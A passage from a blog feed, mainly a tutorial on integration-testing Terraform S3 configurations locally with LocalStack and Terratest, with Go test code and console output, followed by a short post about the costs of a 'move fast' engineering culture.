<p>Anyway, LocalStack spins up a containerized environment that mimics AWS services locally. No real resources, no surprise bills, no cleanup headaches. Your Terraform code thinks it’s talking to real AWS, but it’s actually hitting LocalStack’s mock services running in Docker. This approach addresses several pain points at once: feedback loops are fast, with tests running in seconds rather than minutes; integration with CI/CD is straightforward since everything runs in containers; tests exercise real API interactions, unlike unit tests with mocks; and cleanup is automatic when the container dies.</p>

<h2 id="setting-up-your-test-environment">Setting Up Your Test Environment</h2>

<p>Let’s walk through a basic example that tests an S3 bucket configuration. You’ll need a basic Terraform configuration and a Go test file to get started. Here’s a simple configuration that creates an S3 bucket with some tags:</p>

<p><strong>test.tf:</strong></p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># An example Terraform configuration (stolen from provider docs) for provisioning an S3 bucket with Localstack</span>
<span class="nx">resource</span> <span class="s2">"aws_s3_bucket"</span> <span class="s2">"example"</span> <span class="p">{</span>
  <span class="nx">bucket</span> <span class="o">=</span> <span class="s2">"my-tf-test-bucket"</span>

  <span class="nx">tags</span> <span class="o">=</span> <span class="p">{</span>
    <span class="nx">Name</span>        <span class="o">=</span> <span class="s2">"My bucket"</span>
    <span class="nx">Environment</span> <span class="o">=</span> <span class="s2">"Dev"</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>For the provider configuration, you have two options. The first approach requires configuring the AWS provider to point directly to LocalStack endpoints. Notice how we’re pointing the AWS provider endpoints to LocalStack instead of real AWS, using dummy credentials since LocalStack doesn’t authenticate, and setting default tags to help identify resources created during testing:</p>

<p><strong>providers.tf:</strong></p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">provider</span> <span class="s2">"aws"</span> <span class="p">{</span>
  <span class="nx">region</span>                      <span class="o">=</span> <span class="s2">"us-east-1"</span>
  <span class="nx">access_key</span>                  <span class="o">=</span> <span class="s2">"test"</span>
  <span class="nx">secret_key</span>                  <span class="o">=</span> <span class="s2">"test"</span>
  <span class="nx">s3_use_path_style</span>           <span class="o">=</span> <span class="kc">false</span>
  <span class="nx">skip_credentials_validation</span> <span class="o">=</span> <span class="kc">true</span>
  <span class="nx">skip_metadata_api_check</span>     <span class="o">=</span> <span class="kc">true</span>
  <span class="nx">skip_requesting_account_id</span>  <span class="o">=</span> <span class="kc">true</span>


  <span class="nx">endpoints</span> <span class="p">{</span>
    <span class="nx">s3</span>                       <span class="o">=</span> <span class="s2">"http://s3.localhost.localstack.cloud:4566"</span>
    <span class="nx">sts</span>                      <span class="o">=</span> <span class="s2">"http://localhost:4566"</span>
  <span class="p">}</span>

  <span class="nx">default_tags</span> <span class="p">{</span>
    <span class="nx">tags</span> <span class="o">=</span> <span class="p">{</span>
      <span class="nx">Environment</span> <span class="o">=</span> <span class="s2">"Local"</span>
      <span class="nx">Service</span>     <span class="o">=</span> <span class="s2">"LocalStack"</span>
    <span class="p">}</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Alternatively, you can skip the provider configuration entirely by using the <code class="language-plaintext highlighter-rouge">tflocal</code> binary instead of <code class="language-plaintext highlighter-rouge">terraform</code>. This is LocalStack’s wrapper around Terraform that automatically configures all the necessary provider settings. To use this approach, you’ll need to install LocalStack’s <code class="language-plaintext highlighter-rouge">terraform-local</code> package in your test environment with <code class="language-plaintext highlighter-rouge">pip install terraform-local</code>, then set the <code class="language-plaintext highlighter-rouge">TerraformBinary</code> option in your Terratest configuration to <code class="language-plaintext highlighter-rouge">tflocal</code>. This simplifies your setup significantly since you don’t need to manage provider endpoint configurations, but it does add a Python dependency to your test environment.</p>

<h2 id="writing-comprehensive-tests">Writing Comprehensive Tests</h2>

<p>The Go test is where <code class="language-plaintext highlighter-rouge">go-localstack</code> shines by abstracting away the container management complexity. Here’s a basic test that demonstrates the core functionality:</p>

<p><strong>s3_bucket_test.go:</strong></p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">package</span> <span class="n">main</span>

<span class="k">import</span> <span class="p">(</span>
	<span class="s">"context"</span>
	<span class="s">"testing"</span>

	<span class="s">"github.com/R0seSecurity/go-localstack/localstack"</span>
	<span class="s">"github.com/docker/docker/client"</span>
	<span class="s">"github.com/gruntwork-io/terratest/modules/terraform"</span>
	<span class="s">"github.com/stretchr/testify/assert"</span>
<span class="p">)</span>

<span class="k">func</span> <span class="n">TestS3BucketWithLocalStack</span><span class="p">(</span><span class="n">t</span> <span class="o">*</span><span class="n">testing</span><span class="o">.</span><span class="n">T</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">t</span><span class="o">.</span><span class="n">Parallel</span><span class="p">()</span>

	<span class="n">ctx</span> <span class="o">:=</span> <span class="n">context</span><span class="o">.</span><span class="n">Background</span><span class="p">()</span>

	<span class="c">// Create a Docker client</span>
	<span class="n">cli</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">client</span><span class="o">.</span><span class="n">NewClientWithOpts</span><span class="p">(</span><span class="n">client</span><span class="o">.</span><span class="n">FromEnv</span><span class="p">,</span> <span class="n">client</span><span class="o">.</span><span class="n">WithAPIVersionNegotiation</span><span class="p">())</span>
	<span class="n">assert</span><span class="o">.</span><span class="n">NoError</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span>
	<span class="k">defer</span> <span class="k">func</span><span class="p">()</span> <span class="p">{</span> <span class="n">_</span> <span class="o">=</span> <span class="n">cli</span><span class="o">.</span><span class="n">Close</span><span class="p">()</span> <span class="p">}()</span>

	<span class="c">// Start LocalStack container</span>
	<span class="n">runner</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">localstack</span><span class="o">.</span><span class="n">NewRunner</span><span class="p">(</span><span class="n">cli</span><span class="p">)</span>
	<span class="n">assert</span><span class="o">.</span><span class="n">NoError</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span>

	<span class="n">containerID</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">runner</span><span class="o">.</span><span class="n">Start</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span>
	<span class="n">assert</span><span class="o">.</span><span class="n">NoError</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span>
	<span class="n">assert</span><span class="o">.</span><span class="n">NotEmpty</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">containerID</span><span class="p">)</span>

	<span class="c">// Run Terratest with Terraform options</span>
	<span class="n">tfOptions</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">terraform</span><span class="o">.</span><span class="n">Options</span><span class="p">{</span>
		<span class="n">TerraformDir</span><span class="o">:</span> <span class="s">"."</span><span class="p">,</span>
		<span class="n">Upgrade</span><span class="o">:</span>      <span class="no">true</span><span class="p">,</span>
	<span class="p">}</span>

	<span class="k">defer</span> <span class="n">terraform</span><span class="o">.</span><span class="n">Destroy</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfOptions</span><span class="p">)</span>
	<span class="n">terraform</span><span class="o">.</span><span class="n">InitAndApply</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfOptions</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This basic test spins up a LocalStack container using Docker, configures Terratest to run Terraform commands against our configuration, runs <code class="language-plaintext highlighter-rouge">terraform init</code> and <code class="language-plaintext highlighter-rouge">terraform apply</code>, and automatically runs <code class="language-plaintext highlighter-rouge">terraform destroy</code> when the test completes thanks to the defer statement. The entire test cycle from container startup to resource creation and cleanup takes just under 11 seconds, which is pretty impressive for a full integration test.</p>

<h2 id="advanced-testing-scenarios">Advanced Testing Scenarios</h2>

<p>You can extend this approach significantly beyond basic resource creation. For more comprehensive validation, you can combine Terratest’s built-in helper functions, standard assertions, and the AWS SDK to verify that resources were created with the correct properties. As a first step, here’s how you might validate that the bucket name makes it through to a Terraform output.</p>

<p>Add an output to your Terraform configuration:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">output</span> <span class="s2">"bucket_name"</span> <span class="p">{</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"The name of the S3 bucket"</span>
  <span class="nx">value</span>       <span class="o">=</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">example</span><span class="p">.</span><span class="nx">bucket</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Then update your test to read that output and assert on its value:</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// After terraform apply, validate the bucket was created correctly</span>
<span class="n">bucketName</span> <span class="o">:=</span> <span class="n">terraform</span><span class="o">.</span><span class="n">Output</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfOptions</span><span class="p">,</span> <span class="s">"bucket_name"</span><span class="p">)</span>
<span class="n">assert</span><span class="o">.</span><span class="n">Equal</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="s">"my-tf-test-bucket"</span><span class="p">,</span> <span class="n">bucketName</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="using-test-fixtures-and-variables">Using Test Fixtures and Variables</h2>

<p>For testing modules with different configurations, you can leverage Terratest’s support for variable files and fixtures. Create a <code class="language-plaintext highlighter-rouge">fixtures</code> directory with different <code class="language-plaintext highlighter-rouge">.tfvars</code> files for various test scenarios:</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// Assumes "fmt" and a UUID package such as github.com/google/uuid are imported</span>
<span class="n">tfOptions</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">terraform</span><span class="o">.</span><span class="n">Options</span><span class="p">{</span>
    <span class="n">TerraformDir</span><span class="o">:</span> <span class="s">"./fixtures/basic-bucket"</span><span class="p">,</span>
    <span class="n">VarFiles</span><span class="o">:</span>     <span class="p">[]</span><span class="kt">string</span><span class="p">{</span><span class="s">"test.tfvars"</span><span class="p">},</span>
    <span class="n">Vars</span><span class="o">:</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="k">interface</span><span class="p">{}{</span>
        <span class="s">"bucket_name"</span><span class="o">:</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"test-bucket-%s"</span><span class="p">,</span> <span class="n">uuid</span><span class="o">.</span><span class="n">New</span><span class="p">()</span><span class="o">.</span><span class="n">String</span><span class="p">()),</span>
        <span class="s">"environment"</span><span class="o">:</span> <span class="s">"test"</span><span class="p">,</span>
    <span class="p">},</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This approach allows you to test the same module with different input combinations, so you can confirm that it handles edge cases correctly. You can create separate test functions for different scenarios: basic functionality, advanced configurations, error conditions, and variable validation. For example, you might have <code class="language-plaintext highlighter-rouge">TestBasicS3Bucket</code>, <code class="language-plaintext highlighter-rouge">TestS3BucketWithEncryption</code>, and <code class="language-plaintext highlighter-rouge">TestS3BucketWithInvalidName</code> to cover various use cases.</p>
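
<p>One way to keep those scenarios manageable is a small table of named overrides merged onto shared defaults. This is a sketch rather than code from the original test: the <code class="language-plaintext highlighter-rouge">scenario</code> type, the <code class="language-plaintext highlighter-rouge">varsFor</code> helper, and the <code class="language-plaintext highlighter-rouge">enable_encryption</code> variable are hypothetical names, and your module’s inputs will differ.</p>

```go
package main

// scenario is one named input combination for the module under test.
type scenario struct {
	name      string
	overrides map[string]interface{}
}

// exampleScenarios loosely mirrors the test names mentioned above. The
// variable names are placeholders, not inputs the module is known to define.
var exampleScenarios = []scenario{
	{name: "basic", overrides: nil},
	{name: "with-encryption", overrides: map[string]interface{}{"enable_encryption": true}},
	{name: "invalid-name", overrides: map[string]interface{}{"bucket_name": "Invalid_Bucket_Name"}},
}

// varsFor merges a scenario's overrides on top of shared defaults and returns
// a new map shaped like the Vars field of terraform.Options. The defaults map
// is left untouched so it can be reused across scenarios.
func varsFor(defaults map[string]interface{}, sc scenario) map[string]interface{} {
	merged := make(map[string]interface{}, len(defaults)+len(sc.overrides))
	for k, v := range defaults {
		merged[k] = v
	}
	for k, v := range sc.overrides {
		merged[k] = v
	}
	return merged
}
```

<p>Inside a loop over the table, each scenario can run as its own subtest with <code class="language-plaintext highlighter-rouge">t.Run(sc.name, ...)</code>, passing <code class="language-plaintext highlighter-rouge">varsFor(defaults, sc)</code> as the <code class="language-plaintext highlighter-rouge">Vars</code> value. Whether you prefer a table like this or separate test functions is mostly a matter of taste; the table tends to pay off once the scenarios share most of their setup.</p>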

<h2 id="testing-multi-resource-stacks">Testing Multi-Resource Stacks</h2>

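<p>The real power of this approach becomes evident when testing entire stacks of interconnected resources. You can apply complete environments with VPCs, subnets, security groups, and EC2 instances against LocalStack. Because every emulated service sits behind the same LocalStack endpoint, resources can reference and call each other much as they would in a real account: Lambda functions can invoke other services, objects can be written to S3 buckets, and API Gateway can route to the right backend. Keep in mind that emulation depth varies by service and by LocalStack edition, and some resources (EC2 instances, for example) may be emulated at the API level rather than run as real machines, so check the coverage for the services your module depends on.</p>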

<p>Error condition testing is equally valuable. Intentionally break a configuration or pass invalid inputs, then assert that your module fails gracefully and provides a helpful error message. This helps catch issues before they hit production and ensures your error handling is robust.</p>

<h2 id="running-your-tests">Running Your Tests</h2>

<p>With everything in place, you can run your tests with: <code class="language-plaintext highlighter-rouge">go test -v ./...</code>. The output shows what’s happening during the test execution, including container startup, Terraform planning and applying, resource creation, and cleanup. The combination of LocalStack’s AWS emulation and Terratest’s testing framework gives you confidence that your infrastructure code works without the operational overhead of managing test accounts or worrying about resource cleanup.</p>

<p><strong>Test output:</strong></p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ go test -v ./...
=== RUN   TestS3BucketWithLocalStack
{"status":"Pulling from localstack/localstack","id":"latest"}
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 retry.go:91: terraform [init -upgrade=true]
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 logger.go:67: Running command terraform with args [init -upgrade=true]
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 logger.go:67: Initializing the backend...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: Initializing provider plugins...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: - Finding latest version of hashicorp/aws...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: - Using previously-installed hashicorp/aws v6.9.0
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67: Terraform will perform the following actions:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
</span><span class="gp">TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:   #</span><span class="w"> </span>aws_s3_bucket.example will be created
<span class="go">TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:   + resource "aws_s3_bucket" "example" {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + acceleration_status         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + acl                         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + arn                         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket                      = "my-tf-test-bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_domain_name          = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_prefix               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_region               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_regional_domain_name = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + force_destroy               = false
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + hosted_zone_id              = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + id                          = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + object_lock_enabled         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + policy                      = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + region                      = "us-east-1"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + request_payer               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + tags                        = {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Environment" = "Dev"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Name"        = "My bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:         }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + tags_all                    = {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Environment" = "Dev"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Name"        = "My bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Service"     = "LocalStack"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:         }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website_domain              = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website_endpoint            = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + cors_rule (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + grant (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + lifecycle_rule (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + logging (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + object_lock_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + replication_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + server_side_encryption_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + versioning (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:     }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67: Plan: 1 to add, 0 to change, 0 to destroy.
TestS3BucketWithLocalStack 2025-08-15T12:19:34-04:00 logger.go:67: aws_s3_bucket.example: Creating...
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: aws_s3_bucket.example: Creation complete after 0s [id=my-tf-test-bucket]
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 retry.go:91: terraform [destroy -auto-approve -input=false -lock=false]
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: Running command terraform with args [destroy -auto-approve -input=false -lock=false]
TestS3BucketWithLocalStack 2025-08-15T12:19:38-04:00 logger.go:67: Plan: 0 to add, 0 to change, 1 to destroy.
TestS3BucketWithLocalStack 2025-08-15T12:19:39-04:00 logger.go:67: aws_s3_bucket.example: Destroying... [id=my-tf-test-bucket]
TestS3BucketWithLocalStack 2025-08-15T12:19:39-04:00 logger.go:67: aws_s3_bucket.example: Destruction complete after 0s

--- PASS: TestS3BucketWithLocalStack (10.83s)
</span></code></pre></div></div>

<p>I hope this gives you a solid foundation for testing your Terraform modules with the TerraStack. By leveraging LocalStack and Terratest, you can create fast, reliable tests that run locally or in CI/CD pipelines without the overhead of managing real AWS resources. This approach not only speeds up your development cycle but also gives you confidence that your IaC works as intended before it hits production. Happy testing! If you’re interested in more of my work, check out my <a href="https://github.com/R0seSecurity">GitHub</a>.</p>]]></content><author><name></name></author><category term="terraform" /><category term="quality" /><category term="testing" /><category term="iac" /><summary type="html"><![CDATA[Context]]></summary></entry><entry><title type="html">Rushing Toward Rewrite</title><link href="https://rosesecurity.cloud/2025/03/26/rushing-toward-rewrite.html" rel="alternate" type="text/html" title="Rushing Toward Rewrite" /><published>2025-03-26T00:00:00+00:00</published><updated>2025-03-26T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/03/26/rushing-toward-rewrite</id><content type="html" xml:base="https://rosesecurity.cloud/2025/03/26/rushing-toward-rewrite.html"><![CDATA[<p>This is part three of my microblog series exploring the subtle dysfunctions that plague engineering organizations. After discussing over-abstraction as a liability and unpacking how excessive toil kills engineering teams, this post tackles a nuanced threat: when “moving fast” becomes a cultural shortcut for cutting corners.</p>

<h2 id="move-fast-and-dont-break-everything">Move Fast and Don’t Break Everything</h2>

<p>A former CEO of mine used to say: <em>“Be fast or be perfect. And since no one’s perfect, you better be fast.”</em> Sounds cool until that motto becomes a shield to skip due diligence, code reviews, and even basic security hygiene. Speed wasn’t a value—it was an excuse. PRs rushed. On-call flaring. Postmortems piling. And still, engineers asking for admin access “to move fast.”</p>

<p>Spoiler: they didn’t need it.</p>

<p>The deeper problem? We weren’t a scrappy startup anymore—we were operating at enterprise scale with a startup mindset. The cost of speed was technical debt, fragility, and a long tail of rework. When I transitioned to a new role (back in startup mode) I heard the same “move fast” mantra. But this time, it hit differently. Because here’s the truth: <em>moving fast is possible without setting your future self on fire</em>.</p>

<p>Here’s what I’ve learned:</p>

<p><strong>1. Fail fast—but fail forward.</strong> Don’t just throw things at prod and hope they stick. Structure your failures. If a solution’s not viable, surface that early with data and a path forward. Good failure leaves breadcrumbs for the next iteration.</p>

<p><strong>2. Build for iteration.</strong> Forget perfect. Aim for clear next steps. Your <code class="language-plaintext highlighter-rouge">v1</code> should be designed with a roadmap in mind. Where will this evolve? What trade-offs are you making? Ship it—but know how you’ll ship it <em>better</em>.</p>

<p><strong>3. Stay modular.</strong> Design with exits. If your observability pipeline starts with a pricey SaaS, fine. But make it swappable. Keep your vendor coupling thin so you can self-host later without a complete rewrite.</p>

<p><strong>4. Be honest about scale.</strong> What worked for a team of 10 won’t work at 100. “Move fast” looks different when customers depend on your uptime. Match your velocity with the blast radius of your decisions.</p>

<p>We glamorize speed, but the smartest teams know when to slow down, breathe, and make thoughtful decisions that stand the test of time. Move fast—but don’t break the foundation.</p>]]></content><author><name></name></author><category term="terraform" /><category term="culture" /><category term="technicaldebt" /><category term="quality" /><category term="code" /><summary type="html"><![CDATA[This is part three of my microblog series exploring the subtle dysfunctions that plague engineering organizations. After discussing over-abstraction as a liability and unpacking how excessive toil kills engineering teams, this post tackles a nuanced threat: when “moving fast” becomes a cultural shortcut for cutting corners.]]></summary></entry></feed>